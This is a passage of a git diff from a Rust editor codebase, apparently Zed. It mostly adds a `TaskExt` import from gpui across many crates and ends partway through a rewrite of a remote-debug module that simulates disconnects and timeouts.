diff --git a/crates/project/src/project.rs b/crates/project/src/project.rs index 4e74c4cf1fcf40..ac34cbdd0610c2 100644 --- a/crates/project/src/project.rs +++ b/crates/project/src/project.rs @@ -86,7 +86,7 @@ use image_store::{ImageItemEvent, ImageStoreEvent}; use ::git::{blame::Blame, status::FileStatus}; use gpui::{ App, AppContext, AsyncApp, BorrowAppContext, Context, Entity, EventEmitter, Hsla, SharedString, - Task, WeakEntity, Window, + Task, TaskExt, WeakEntity, Window, }; use language::{ Buffer, BufferEvent, Capability, CodeLabel, CursorShape, DiskState, Language, LanguageName, diff --git a/crates/project/src/worktree_store.rs b/crates/project/src/worktree_store.rs index c6abb6e1743540..f544973a548b92 100644 --- a/crates/project/src/worktree_store.rs +++ b/crates/project/src/worktree_store.rs @@ -12,7 +12,7 @@ use collections::HashMap; use fs::{Fs, copy_recursive}; use futures::{FutureExt, future::Shared}; use gpui::{ - App, AppContext as _, AsyncApp, Context, Entity, EntityId, EventEmitter, Global, Task, + App, AppContext as _, AsyncApp, Context, Entity, EntityId, EventEmitter, Global, Task, TaskExt, WeakEntity, }; use itertools::Either; diff --git a/crates/project_benchmarks/src/main.rs b/crates/project_benchmarks/src/main.rs index 054b5eb95a5627..01dc141904e925 100644 --- a/crates/project_benchmarks/src/main.rs +++ b/crates/project_benchmarks/src/main.rs @@ -6,6 +6,7 @@ use clap::Parser; use client::{Client, UserStore}; use futures::channel::oneshot; use gpui::AppContext as _; +use gpui::TaskExt; use http_client::FakeHttpClient; use language::LanguageRegistry; use node_runtime::NodeRuntime; diff --git a/crates/project_symbols/src/project_symbols.rs b/crates/project_symbols/src/project_symbols.rs index 8edcd9a80d1759..2202ff35e18b2f 100644 --- a/crates/project_symbols/src/project_symbols.rs +++ b/crates/project_symbols/src/project_symbols.rs @@ -1,8 +1,8 @@ use editor::{Bias, Editor, SelectionEffects, scroll::Autoscroll, styled_runs_for_code_label}; use 
fuzzy::{StringMatch, StringMatchCandidate}; use gpui::{ - App, Context, DismissEvent, Entity, HighlightStyle, ParentElement, StyledText, Task, TextStyle, - WeakEntity, Window, relative, rems, + App, Context, DismissEvent, Entity, HighlightStyle, ParentElement, StyledText, Task, TaskExt, + TextStyle, WeakEntity, Window, relative, rems, }; use ordered_float::OrderedFloat; use picker::{Picker, PickerDelegate}; diff --git a/crates/recent_projects/src/recent_projects.rs b/crates/recent_projects/src/recent_projects.rs index 4b99ed37a38642..a5fb5f60450830 100644 --- a/crates/recent_projects/src/recent_projects.rs +++ b/crates/recent_projects/src/recent_projects.rs @@ -25,7 +25,7 @@ use disconnected_overlay::DisconnectedOverlay; use fuzzy_nucleo::{StringMatch, StringMatchCandidate, match_strings}; use gpui::{ Action, AnyElement, App, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, - Subscription, Task, WeakEntity, Window, actions, px, + Subscription, Task, TaskExt, WeakEntity, Window, actions, px, }; use picker::{ diff --git a/crates/recent_projects/src/remote_servers.rs b/crates/recent_projects/src/remote_servers.rs index f475baddd99376..3c1ad319461cc0 100644 --- a/crates/recent_projects/src/remote_servers.rs +++ b/crates/recent_projects/src/remote_servers.rs @@ -15,7 +15,7 @@ use extension_host::ExtensionStore; use futures::{FutureExt, StreamExt as _, channel::oneshot, future::Shared}; use gpui::{ Action, AnyElement, App, ClickEvent, ClipboardItem, Context, DismissEvent, Entity, - EventEmitter, FocusHandle, Focusable, PromptLevel, ScrollHandle, Subscription, Task, + EventEmitter, FocusHandle, Focusable, PromptLevel, ScrollHandle, Subscription, Task, TaskExt, WeakEntity, Window, canvas, }; use log::{debug, info}; diff --git a/crates/recent_projects/src/sidebar_recent_projects.rs b/crates/recent_projects/src/sidebar_recent_projects.rs index 495907d3934b4a..0b4d3722a344e5 100644 --- a/crates/recent_projects/src/sidebar_recent_projects.rs +++ 
b/crates/recent_projects/src/sidebar_recent_projects.rs @@ -3,7 +3,7 @@ use std::sync::Arc; use fuzzy_nucleo::{StringMatch, StringMatchCandidate, match_strings}; use gpui::{ Action, AnyElement, App, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, - Subscription, Task, WeakEntity, Window, + Subscription, Task, TaskExt, WeakEntity, Window, }; use picker::{ Picker, PickerDelegate, diff --git a/crates/remote/src/remote_client.rs b/crates/remote/src/remote_client.rs index 138238c5fd45cd..85e07aee0b430a 100644 --- a/crates/remote/src/remote_client.rs +++ b/crates/remote/src/remote_client.rs @@ -26,7 +26,7 @@ use futures::{ }; use gpui::{ App, AppContext as _, AsyncApp, BackgroundExecutor, BorrowAppContext, Context, Entity, - EventEmitter, FutureExt, Global, Task, WeakEntity, + EventEmitter, FutureExt, Global, Task, TaskExt, WeakEntity, }; use parking_lot::Mutex; diff --git a/crates/remote_server/src/headless_project.rs b/crates/remote_server/src/headless_project.rs index 7b0fc0356a130d..098993debad82e 100644 --- a/crates/remote_server/src/headless_project.rs +++ b/crates/remote_server/src/headless_project.rs @@ -8,7 +8,7 @@ use lsp::LanguageServerId; use extension::ExtensionHostProxy; use extension_host::headless_host::HeadlessExtensionStore; use fs::Fs; -use gpui::{App, AppContext as _, AsyncApp, Context, Entity, PromptLevel}; +use gpui::{App, AppContext as _, AsyncApp, Context, Entity, PromptLevel, TaskExt}; use http_client::HttpClient; use language::{Buffer, BufferEvent, LanguageRegistry, proto::serialize_operation}; use node_runtime::NodeRuntime; diff --git a/crates/repl/src/notebook/notebook_ui.rs b/crates/repl/src/notebook/notebook_ui.rs index 78b7f1a4e514b7..d1c44667f940fe 100644 --- a/crates/repl/src/notebook/notebook_ui.rs +++ b/crates/repl/src/notebook/notebook_ui.rs @@ -11,7 +11,7 @@ use futures::FutureExt; use futures::future::Shared; use gpui::{ AnyElement, App, Entity, EventEmitter, FocusHandle, Focusable, KeyContext, ListScrollEvent, - 
ListState, Point, Task, actions, list, prelude::*, + ListState, Point, Task, TaskExt, actions, list, prelude::*, }; use jupyter_protocol::JupyterKernelspec; use language::{Language, LanguageRegistry}; diff --git a/crates/repl/src/repl_sessions_ui.rs b/crates/repl/src/repl_sessions_ui.rs index 9781382fc85d5d..5fd1e922a50ee0 100644 --- a/crates/repl/src/repl_sessions_ui.rs +++ b/crates/repl/src/repl_sessions_ui.rs @@ -1,6 +1,6 @@ use editor::Editor; use gpui::{ - AnyElement, App, Entity, EventEmitter, FocusHandle, Focusable, Subscription, actions, + AnyElement, App, Entity, EventEmitter, FocusHandle, Focusable, Subscription, TaskExt, actions, prelude::*, }; use project::ProjectItem as _; diff --git a/crates/repl/src/repl_store.rs b/crates/repl/src/repl_store.rs index 4c5827b7c0cf88..b2bf90e99dcd72 100644 --- a/crates/repl/src/repl_store.rs +++ b/crates/repl/src/repl_store.rs @@ -4,7 +4,9 @@ use std::sync::Arc; use anyhow::{Context as _, Result}; use collections::{HashMap, HashSet}; use command_palette_hooks::CommandPaletteFilter; -use gpui::{App, Context, Entity, EntityId, Global, SharedString, Subscription, Task, prelude::*}; +use gpui::{ + App, Context, Entity, EntityId, Global, SharedString, Subscription, Task, TaskExt, prelude::*, +}; use jupyter_websocket_client::RemoteServer; use language::{Language, LanguageName}; use project::{Fs, Project, ProjectPath, WorktreeId}; diff --git a/crates/rules_library/src/rules_library.rs b/crates/rules_library/src/rules_library.rs index e5105081ca7af7..9f87d403e72fce 100644 --- a/crates/rules_library/src/rules_library.rs +++ b/crates/rules_library/src/rules_library.rs @@ -4,7 +4,7 @@ use editor::SelectionEffects; use editor::{CurrentLineHighlight, Editor, EditorElement, EditorEvent, EditorStyle, actions::Tab}; use gpui::{ App, Bounds, DEFAULT_ADDITIONAL_WINDOW_SIZE, Entity, EventEmitter, Focusable, PromptLevel, - Subscription, Task, TextStyle, Tiling, TitlebarOptions, WindowBounds, WindowHandle, + Subscription, Task, TaskExt, 
TextStyle, Tiling, TitlebarOptions, WindowBounds, WindowHandle, WindowOptions, actions, point, size, transparent_black, }; use language::{Buffer, LanguageRegistry, language_settings::SoftWrap}; diff --git a/crates/search/src/buffer_search.rs b/crates/search/src/buffer_search.rs index 41dda49efa3224..30805264522cf1 100644 --- a/crates/search/src/buffer_search.rs +++ b/crates/search/src/buffer_search.rs @@ -22,7 +22,7 @@ use futures::channel::oneshot; use gpui::{ Action as _, App, ClickEvent, Context, Entity, EventEmitter, Focusable, InteractiveElement as _, IntoElement, KeyContext, ParentElement as _, Render, ScrollHandle, - Styled, Subscription, Task, WeakEntity, Window, div, + Styled, Subscription, Task, TaskExt, WeakEntity, Window, div, }; use language::{Language, LanguageRegistry}; use project::{ diff --git a/crates/search/src/project_search.rs b/crates/search/src/project_search.rs index 00966436595136..1ca53632dba59a 100644 --- a/crates/search/src/project_search.rs +++ b/crates/search/src/project_search.rs @@ -22,7 +22,8 @@ use futures::{StreamExt, stream::FuturesOrdered}; use gpui::{ Action, AnyElement, App, Axis, Context, Entity, EntityId, EventEmitter, FocusHandle, Focusable, Global, Hsla, InteractiveElement, IntoElement, KeyContext, ParentElement, Point, Render, - SharedString, Styled, Subscription, Task, UpdateGlobal, WeakEntity, Window, actions, div, + SharedString, Styled, Subscription, Task, TaskExt, UpdateGlobal, WeakEntity, Window, actions, + div, }; use itertools::Itertools; use language::{Buffer, Language}; diff --git a/crates/settings_ui/src/pages/edit_prediction_provider_setup.rs b/crates/settings_ui/src/pages/edit_prediction_provider_setup.rs index fd6ea35c1e366c..d101effe5bfca7 100644 --- a/crates/settings_ui/src/pages/edit_prediction_provider_setup.rs +++ b/crates/settings_ui/src/pages/edit_prediction_provider_setup.rs @@ -5,7 +5,7 @@ use edit_prediction::{ open_ai_compatible::{open_ai_compatible_api_token, open_ai_compatible_api_url}, }; use 
edit_prediction_ui::{get_available_providers, set_completion_provider}; -use gpui::{App, Entity, ScrollHandle, prelude::*}; +use gpui::{App, Entity, ScrollHandle, TaskExt, prelude::*}; use language::language_settings::AllLanguageSettings; use settings::Settings as _; diff --git a/crates/sidebar/src/sidebar.rs b/crates/sidebar/src/sidebar.rs index 57b7c9b2cbb238..0000aac3f36026 100644 --- a/crates/sidebar/src/sidebar.rs +++ b/crates/sidebar/src/sidebar.rs @@ -23,8 +23,8 @@ use feature_flags::{ }; use gpui::{ Action as _, AnyElement, App, ClickEvent, Context, DismissEvent, Entity, EntityId, FocusHandle, - Focusable, KeyContext, ListState, Modifiers, Pixels, Render, SharedString, Task, WeakEntity, - Window, WindowHandle, linear_color_stop, linear_gradient, list, prelude::*, px, + Focusable, KeyContext, ListState, Modifiers, Pixels, Render, SharedString, Task, TaskExt, + WeakEntity, Window, WindowHandle, linear_color_stop, linear_gradient, list, prelude::*, px, }; use menu::{ Cancel, Confirm, SelectChild, SelectFirst, SelectLast, SelectNext, SelectParent, SelectPrevious, diff --git a/crates/snippets_ui/src/snippets_ui.rs b/crates/snippets_ui/src/snippets_ui.rs index c881d5276e6f96..ffb136f625286f 100644 --- a/crates/snippets_ui/src/snippets_ui.rs +++ b/crates/snippets_ui/src/snippets_ui.rs @@ -2,7 +2,7 @@ use file_icons::FileIcons; use fuzzy::{StringMatch, StringMatchCandidate, match_strings}; use gpui::{ App, Context, DismissEvent, Entity, EventEmitter, Focusable, ParentElement, Render, Styled, - WeakEntity, Window, actions, + TaskExt, WeakEntity, Window, actions, }; use language::{LanguageMatcher, LanguageName, LanguageRegistry}; use open_path_prompt::file_finder_settings::FileFinderSettings; diff --git a/crates/tab_switcher/src/tab_switcher.rs b/crates/tab_switcher/src/tab_switcher.rs index ac4087bb96b2ff..67adf2583d8103 100644 --- a/crates/tab_switcher/src/tab_switcher.rs +++ b/crates/tab_switcher/src/tab_switcher.rs @@ -9,7 +9,7 @@ use 
fuzzy_nucleo::StringMatchCandidate; use gpui::{ Action, AnyElement, App, Context, DismissEvent, Entity, EntityId, EventEmitter, FocusHandle, Focusable, Modifiers, ModifiersChangedEvent, MouseButton, MouseUpEvent, ParentElement, Point, - Render, Styled, Task, WeakEntity, Window, actions, rems, + Render, Styled, Task, TaskExt, WeakEntity, Window, actions, rems, }; use picker::{Picker, PickerDelegate}; use project::Project; diff --git a/crates/task/src/static_source.rs b/crates/task/src/static_source.rs index 9e4051ef9721f4..a98d38a8eb81ea 100644 --- a/crates/task/src/static_source.rs +++ b/crates/task/src/static_source.rs @@ -3,7 +3,7 @@ use std::sync::Arc; use futures::{StreamExt, channel::mpsc::UnboundedSender}; -use gpui::{App, AppContext}; +use gpui::{App, AppContext, TaskExt}; use parking_lot::RwLock; use serde::Deserialize; use util::ResultExt; diff --git a/crates/tasks_ui/src/tasks_ui.rs b/crates/tasks_ui/src/tasks_ui.rs index ca8ebb5248e4e6..072ad29c1b765e 100644 --- a/crates/tasks_ui/src/tasks_ui.rs +++ b/crates/tasks_ui/src/tasks_ui.rs @@ -2,7 +2,7 @@ use std::{path::Path, sync::Arc}; use collections::HashMap; use editor::Editor; -use gpui::{App, AppContext as _, Context, Entity, Task, Window}; +use gpui::{App, AppContext as _, Context, Entity, Task, TaskExt, Window}; use project::{Location, TaskContexts, TaskSourceKind, Worktree}; use task::{RevealTarget, TaskContext, TaskId, TaskTemplate, TaskVariables, VariableName}; use workspace::Workspace; diff --git a/crates/terminal_view/src/terminal_panel.rs b/crates/terminal_view/src/terminal_panel.rs index 642243ae147539..4ad40b06e67616 100644 --- a/crates/terminal_view/src/terminal_panel.rs +++ b/crates/terminal_view/src/terminal_panel.rs @@ -12,8 +12,8 @@ use db::kvp::KeyValueStore; use futures::{channel::oneshot, future::join_all}; use gpui::{ Action, Anchor, AnyView, App, AsyncApp, AsyncWindowContext, Context, Entity, EventEmitter, - FocusHandle, Focusable, IntoElement, ParentElement, Pixels, Render, Styled, 
Task, WeakEntity, - Window, actions, + FocusHandle, Focusable, IntoElement, ParentElement, Pixels, Render, Styled, Task, TaskExt, + WeakEntity, Window, actions, }; use itertools::Itertools; use project::{Fs, Project}; diff --git a/crates/terminal_view/src/terminal_path_like_target.rs b/crates/terminal_view/src/terminal_path_like_target.rs index f0f13d8fc2cd73..fb3abf41db74ca 100644 --- a/crates/terminal_view/src/terminal_path_like_target.rs +++ b/crates/terminal_view/src/terminal_path_like_target.rs @@ -1,7 +1,7 @@ use super::{HoverTarget, HoveredWord, TerminalView}; use anyhow::{Context as _, Result}; use editor::Editor; -use gpui::{App, AppContext, Context, Task, WeakEntity, Window}; +use gpui::{App, AppContext, Context, Task, TaskExt, WeakEntity, Window}; use itertools::Itertools; use project::{Entry, Metadata}; use std::path::PathBuf; diff --git a/crates/terminal_view/src/terminal_view.rs b/crates/terminal_view/src/terminal_view.rs index a6e28a95f50de4..07c638c16048c3 100644 --- a/crates/terminal_view/src/terminal_view.rs +++ b/crates/terminal_view/src/terminal_view.rs @@ -11,8 +11,8 @@ use editor::{ use gpui::{ Action, AnyElement, App, ClipboardEntry, DismissEvent, Entity, EventEmitter, ExternalPaths, FocusHandle, Focusable, Font, KeyContext, KeyDownEvent, Keystroke, MouseButton, MouseDownEvent, - Pixels, Point, Render, ScrollWheelEvent, Styled, Subscription, Task, WeakEntity, actions, - anchored, deferred, div, + Pixels, Point, Render, ScrollWheelEvent, Styled, Subscription, Task, TaskExt, WeakEntity, + actions, anchored, deferred, div, }; use itertools::Itertools; use menu; diff --git a/crates/title_bar/src/collab.rs b/crates/title_bar/src/collab.rs index 474d0d287e47dc..72569b84fd40b4 100644 --- a/crates/title_bar/src/collab.rs +++ b/crates/title_bar/src/collab.rs @@ -5,8 +5,8 @@ use call::{ActiveCall, Room}; use channel::ChannelStore; use client::{User, proto::PeerId}; use gpui::{ - AnyElement, Hsla, IntoElement, MouseButton, Path, ScreenCaptureSource, 
Styled, WeakEntity, - canvas, point, + AnyElement, Hsla, IntoElement, MouseButton, Path, ScreenCaptureSource, Styled, TaskExt, + WeakEntity, canvas, point, }; use gpui::{App, Task, Window}; use icons::IconName; diff --git a/crates/title_bar/src/onboarding_banner.rs b/crates/title_bar/src/onboarding_banner.rs index 96400a91a0a26f..24dccdc35b9f23 100644 --- a/crates/title_bar/src/onboarding_banner.rs +++ b/crates/title_bar/src/onboarding_banner.rs @@ -2,7 +2,7 @@ // It's currently not in use but is kept for future feature announcements. #![allow(dead_code)] -use gpui::{Action, Entity, Global, Render, SharedString}; +use gpui::{Action, Entity, Global, Render, SharedString, TaskExt}; use ui::{ButtonLike, Tooltip, prelude::*}; use util::ResultExt; diff --git a/crates/title_bar/src/title_bar.rs b/crates/title_bar/src/title_bar.rs index c6f82adcdf01d1..8e194218990975 100644 --- a/crates/title_bar/src/title_bar.rs +++ b/crates/title_bar/src/title_bar.rs @@ -29,7 +29,7 @@ use cloud_api_types::Plan; use gpui::{ Action, Anchor, Animation, AnimationExt, AnyElement, App, Context, Element, Entity, Focusable, InteractiveElement, IntoElement, MouseButton, ParentElement, Render, - StatefulInteractiveElement, Styled, Subscription, WeakEntity, Window, actions, div, + StatefulInteractiveElement, Styled, Subscription, TaskExt, WeakEntity, Window, actions, div, pulsating_between, }; use onboarding_banner::OnboardingBanner; diff --git a/crates/ui/src/components/context_menu.rs b/crates/ui/src/components/context_menu.rs index c8f330526df4d1..ef21abaf3ecc04 100644 --- a/crates/ui/src/components/context_menu.rs +++ b/crates/ui/src/components/context_menu.rs @@ -5,7 +5,7 @@ use crate::{ use gpui::{ Action, Anchor, AnyElement, App, Bounds, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent, Pixels, Point, Size, - Subscription, anchored, canvas, prelude::*, px, + Subscription, TaskExt, anchored, canvas, prelude::*, px, }; use 
menu::{SelectChild, SelectFirst, SelectLast, SelectNext, SelectParent, SelectPrevious}; use std::{ diff --git a/crates/vim/src/command.rs b/crates/vim/src/command.rs index 6c10c3212334c6..da7092db6996c6 100644 --- a/crates/vim/src/command.rs +++ b/crates/vim/src/command.rs @@ -8,7 +8,8 @@ use editor::{ }; use futures::AsyncWriteExt as _; use gpui::{ - Action, App, AppContext as _, Context, Global, Keystroke, Task, WeakEntity, Window, actions, + Action, App, AppContext as _, Context, Global, Keystroke, Task, TaskExt, WeakEntity, Window, + actions, }; use itertools::Itertools; use language::Point; diff --git a/crates/vim/src/helix.rs b/crates/vim/src/helix.rs index 544a19167ac905..796d69b28222b0 100644 --- a/crates/vim/src/helix.rs +++ b/crates/vim/src/helix.rs @@ -11,7 +11,7 @@ use editor::{ NavigationTargetOverlay, SelectionEffects, ToOffset, ToPoint, movement, }; use gpui::actions; -use gpui::{App, Context, Font, Hsla, Pixels, Window, WindowTextSystem}; +use gpui::{App, Context, Font, Hsla, Pixels, TaskExt, Window, WindowTextSystem}; use language::{CharClassifier, CharKind, Point, Selection}; use multi_buffer::MultiBufferSnapshot; use search::{BufferSearchBar, SearchOptions}; diff --git a/crates/vim/src/normal.rs b/crates/vim/src/normal.rs index 1d0d0812e82899..e2ce1fb1284329 100644 --- a/crates/vim/src/normal.rs +++ b/crates/vim/src/normal.rs @@ -28,7 +28,7 @@ use editor::Editor; use editor::{Anchor, SelectionEffects}; use editor::{Bias, ToPoint}; use editor::{display_map::ToDisplayPoint, movement}; -use gpui::{Context, Window, actions}; +use gpui::{Context, TaskExt, Window, actions}; use language::{AutoIndentMode, Point, SelectionGoal}; use log::error; use multi_buffer::MultiBufferRow; diff --git a/crates/vim/src/normal/mark.rs b/crates/vim/src/normal/mark.rs index 48cf8739b725f6..7f205a0fb8fda0 100644 --- a/crates/vim/src/normal/mark.rs +++ b/crates/vim/src/normal/mark.rs @@ -5,7 +5,7 @@ use editor::{ display_map::{DisplaySnapshot, ToDisplayPoint}, movement, }; 
-use gpui::{Context, Entity, EntityId, UpdateGlobal, Window}; +use gpui::{Context, Entity, EntityId, TaskExt, UpdateGlobal, Window}; use language::SelectionGoal; use text::Point; use ui::App; diff --git a/crates/vim/src/normal/search.rs b/crates/vim/src/normal/search.rs index e7d17af1e3eb1d..4fde2f786ce5ab 100644 --- a/crates/vim/src/normal/search.rs +++ b/crates/vim/src/normal/search.rs @@ -1,5 +1,5 @@ use editor::{Editor, EditorSettings}; -use gpui::{Action, Context, Window, actions}; +use gpui::{Action, Context, TaskExt, Window, actions}; use language::Point; use schemars::JsonSchema; use search::{BufferSearchBar, SearchOptions, buffer_search}; diff --git a/crates/vim/src/state.rs b/crates/vim/src/state.rs index 3ca4d704c7ced6..0851604e1abcdf 100644 --- a/crates/vim/src/state.rs +++ b/crates/vim/src/state.rs @@ -15,7 +15,8 @@ use editor::display_map::{is_invisible, replacement}; use editor::{Anchor, ClipboardSelection, Editor, MultiBuffer, ToPoint as EditorToPoint}; use gpui::{ Action, App, AppContext, BorrowAppContext, ClipboardEntry, ClipboardItem, DismissEvent, Entity, - EntityId, Global, HighlightStyle, StyledText, Subscription, Task, TextStyle, WeakEntity, + EntityId, Global, HighlightStyle, StyledText, Subscription, Task, TaskExt, TextStyle, + WeakEntity, }; use language::{Buffer, BufferEvent, BufferId, Chunk, LanguageAwareStyling, Point}; diff --git a/crates/workspace/src/item.rs b/crates/workspace/src/item.rs index 5cd669473c73fd..573a6d9ac0afbc 100644 --- a/crates/workspace/src/item.rs +++ b/crates/workspace/src/item.rs @@ -12,7 +12,7 @@ use client::{Client, proto}; use futures::channel::mpsc; use gpui::{ Action, AnyElement, AnyEntity, AnyView, App, AppContext, Context, Entity, EntityId, - EventEmitter, FocusHandle, Focusable, Font, Pixels, Point, Render, SharedString, Task, + EventEmitter, FocusHandle, Focusable, Font, Pixels, Point, Render, SharedString, Task, TaskExt, WeakEntity, Window, }; use language::Capability; diff --git 
a/crates/workspace/src/multi_workspace.rs b/crates/workspace/src/multi_workspace.rs index 7916646311d328..999b4d30413a5c 100644 --- a/crates/workspace/src/multi_workspace.rs +++ b/crates/workspace/src/multi_workspace.rs @@ -3,8 +3,8 @@ use fs::Fs; use gpui::{ AnyView, App, Context, DragMoveEvent, Entity, EntityId, EventEmitter, FocusHandle, Focusable, - ManagedView, MouseButton, Pixels, Render, Subscription, Task, Tiling, WeakEntity, Window, - WindowId, actions, deferred, px, + ManagedView, MouseButton, Pixels, Render, Subscription, Task, TaskExt, Tiling, WeakEntity, + Window, WindowId, actions, deferred, px, }; pub use project::ProjectGroupKey; use project::{DisableAiSettings, Project}; diff --git a/crates/workspace/src/pane.rs b/crates/workspace/src/pane.rs index aa6e53ef666348..4a2204d4c5f5a2 100644 --- a/crates/workspace/src/pane.rs +++ b/crates/workspace/src/pane.rs @@ -21,8 +21,8 @@ use gpui::{ Action, Anchor, AnyElement, App, AsyncWindowContext, ClickEvent, ClipboardItem, Context, Div, DragMoveEvent, Entity, EntityId, EventEmitter, ExternalPaths, FocusHandle, FocusOutEvent, Focusable, KeyContext, MouseButton, NavigationDirection, Pixels, Point, PromptLevel, Render, - ScrollHandle, Subscription, Task, WeakEntity, WeakFocusHandle, Window, actions, anchored, - deferred, prelude::*, + ScrollHandle, Subscription, Task, TaskExt, WeakEntity, WeakFocusHandle, Window, actions, + anchored, deferred, prelude::*, }; use itertools::Itertools; use language::{Capability, DiagnosticSeverity}; diff --git a/crates/workspace/src/persistence.rs b/crates/workspace/src/persistence.rs index b1328aa3614905..66af132b47c307 100644 --- a/crates/workspace/src/persistence.rs +++ b/crates/workspace/src/persistence.rs @@ -2759,6 +2759,7 @@ mod tests { read_multi_workspace_state, }, }; + use gpui::TaskExt; use gpui::AppContext as _; use pretty_assertions::assert_eq; diff --git a/crates/workspace/src/tasks.rs b/crates/workspace/src/tasks.rs index 3ea35678865553..2d68d7d2ab0af8 100644 --- 
a/crates/workspace/src/tasks.rs +++ b/crates/workspace/src/tasks.rs @@ -2,7 +2,7 @@ use std::process::ExitStatus; use anyhow::Result; use collections::HashSet; -use gpui::{AppContext, AsyncWindowContext, Context, Entity, Task, WeakEntity}; +use gpui::{AppContext, AsyncWindowContext, Context, Entity, Task, TaskExt, WeakEntity}; use language::Buffer; use project::{TaskSourceKind, WorktreeId}; use remote::ConnectionState; diff --git a/crates/workspace/src/welcome.rs b/crates/workspace/src/welcome.rs index 4110cffc46d811..122cc468a4547f 100644 --- a/crates/workspace/src/welcome.rs +++ b/crates/workspace/src/welcome.rs @@ -8,7 +8,7 @@ use agent_settings::AgentSettings; use git::Clone as GitClone; use gpui::{ Action, App, Context, Entity, EventEmitter, FocusHandle, Focusable, InteractiveElement, - ParentElement, Render, Styled, Task, Window, actions, + ParentElement, Render, Styled, Task, TaskExt, Window, actions, }; use gpui::{WeakEntity, linear_color_stop, linear_gradient}; use menu::{SelectNext, SelectPrevious}; diff --git a/crates/workspace/src/workspace.rs b/crates/workspace/src/workspace.rs index 03b01cc79d81ad..bc675729f14cc6 100644 --- a/crates/workspace/src/workspace.rs +++ b/crates/workspace/src/workspace.rs @@ -63,8 +63,8 @@ use gpui::{ Context, CursorStyle, Decorations, DragMoveEvent, Entity, EntityId, EventEmitter, FocusHandle, Focusable, Global, HitboxBehavior, Hsla, KeyContext, Keystroke, ManagedView, MouseButton, PathPromptOptions, Point, PromptLevel, Render, ResizeEdge, Size, Stateful, Subscription, - SystemWindowTabController, Task, Tiling, WeakEntity, WindowBounds, WindowHandle, WindowId, - WindowOptions, actions, canvas, point, relative, size, transparent_black, + SystemWindowTabController, Task, TaskExt, Tiling, WeakEntity, WindowBounds, WindowHandle, + WindowId, WindowOptions, actions, canvas, point, relative, size, transparent_black, }; pub use history_manager::*; pub use item::{ diff --git a/crates/zed/src/main.rs b/crates/zed/src/main.rs index 
8f417ee08abcbf..de49d220cd4b55 100644 --- a/crates/zed/src/main.rs +++ b/crates/zed/src/main.rs @@ -22,8 +22,8 @@ use futures::{StreamExt, channel::oneshot, future}; use git::GitHostingProviderRegistry; use git_ui::clone::clone_and_open; use gpui::{ - App, AppContext, Application, AsyncApp, Focusable as _, QuitMode, Task, UpdateGlobal as _, - block_on, + App, AppContext, Application, AsyncApp, Focusable as _, QuitMode, Task, TaskExt, + UpdateGlobal as _, block_on, }; use gpui_platform; diff --git a/crates/zed/src/reliability.rs b/crates/zed/src/reliability.rs index b74cdebbacd5e5..fd602d4ab50d3e 100644 --- a/crates/zed/src/reliability.rs +++ b/crates/zed/src/reliability.rs @@ -2,7 +2,7 @@ use anyhow::{Context as _, Result}; use client::{Client, telemetry::MINIDUMP_ENDPOINT}; use feature_flags::FeatureFlagAppExt; use futures::{AsyncReadExt, TryStreamExt}; -use gpui::{App, AppContext as _, SerializedThreadTaskTimings}; +use gpui::{App, AppContext as _, SerializedThreadTaskTimings, TaskExt}; use http_client::{self, AsyncBody, HttpClient, Request}; use log::info; use project::Project; diff --git a/crates/zed/src/zed.rs b/crates/zed/src/zed.rs index 3afd117a015de7..180d85440df347 100644 --- a/crates/zed/src/zed.rs +++ b/crates/zed/src/zed.rs @@ -36,7 +36,7 @@ use git_ui::project_diff::{BranchDiffToolbar, ProjectDiffToolbar}; use gpui::{ Action, App, AppContext as _, AsyncWindowContext, ClipboardItem, Context, DismissEvent, Element, Entity, FocusHandle, Focusable, Image, ImageFormat, KeyBinding, ParentElement, - PathPromptOptions, PromptLevel, ReadGlobal, SharedString, Size, Task, TitlebarOptions, + PathPromptOptions, PromptLevel, ReadGlobal, SharedString, Size, Task, TaskExt, TitlebarOptions, UpdateGlobal, WeakEntity, Window, WindowBounds, WindowHandle, WindowKind, WindowOptions, actions, image_cache, img, point, px, retain_all, }; diff --git a/crates/zed/src/zed/open_listener.rs b/crates/zed/src/zed/open_listener.rs index 6faf0d3fe6835d..18ea7c086978cb 100644 --- 
a/crates/zed/src/zed/open_listener.rs +++ b/crates/zed/src/zed/open_listener.rs @@ -14,7 +14,7 @@ use futures::future; use futures::{FutureExt, StreamExt}; use git_ui::{file_diff_view::FileDiffView, multi_diff_view::MultiDiffView}; -use gpui::{App, AsyncApp, Global, WindowHandle}; +use gpui::{App, AsyncApp, Global, TaskExt, WindowHandle}; use onboarding::FIRST_OPEN; use onboarding::show_onboarding_view; use recent_projects::{RemoteSettings, navigate_to_positions, open_remote_project}; diff --git a/crates/zed/src/zed/quick_action_bar/repl_menu.rs b/crates/zed/src/zed/quick_action_bar/repl_menu.rs index 7502481b5b50b6..7b694281b99561 100644 --- a/crates/zed/src/zed/quick_action_bar/repl_menu.rs +++ b/crates/zed/src/zed/quick_action_bar/repl_menu.rs @@ -1,4 +1,5 @@ use gpui::ElementId; +use gpui::TaskExt; use gpui::{AnyElement, Entity}; use picker::Picker; use repl::{ diff --git a/crates/zed/src/zed/remote_debug.rs b/crates/zed/src/zed/remote_debug.rs index df91953c64c400..e658248cdf8269 100644 --- a/crates/zed/src/zed/remote_debug.rs +++ b/crates/zed/src/zed/remote_debug.rs @@ -1,52 +1,53 @@ -use workspace::Workspace; -use zed_actions::remote_debug::{SimulateDisconnect, SimulateTimeout, SimulateTimeoutExhausted}; - -pub fn init(cx: &mut gpui::App) { - cx.observe_new(|workspace: &mut Workspace, _, cx| { - let project = workspace.project().read(cx); - let Some(remote_client) = project.remote_client() else { - return; - }; - - workspace.register_action({ - let remote_client = remote_client.downgrade(); - move |_, _: &SimulateDisconnect, _window, cx| { - let Some(remote_client) = remote_client.upgrade() else { - return; - }; - - log::info!("SimulateDisconnect: forcing disconnect from remote server"); - remote_client.update(cx, |client, cx| { - client.force_disconnect(cx).detach_and_log_err(cx); - }); - } - }); - - workspace.register_action({ - let remote_client = remote_client.downgrade(); - move |_, _: &SimulateTimeout, _window, cx| { - let Some(remote_client) = 
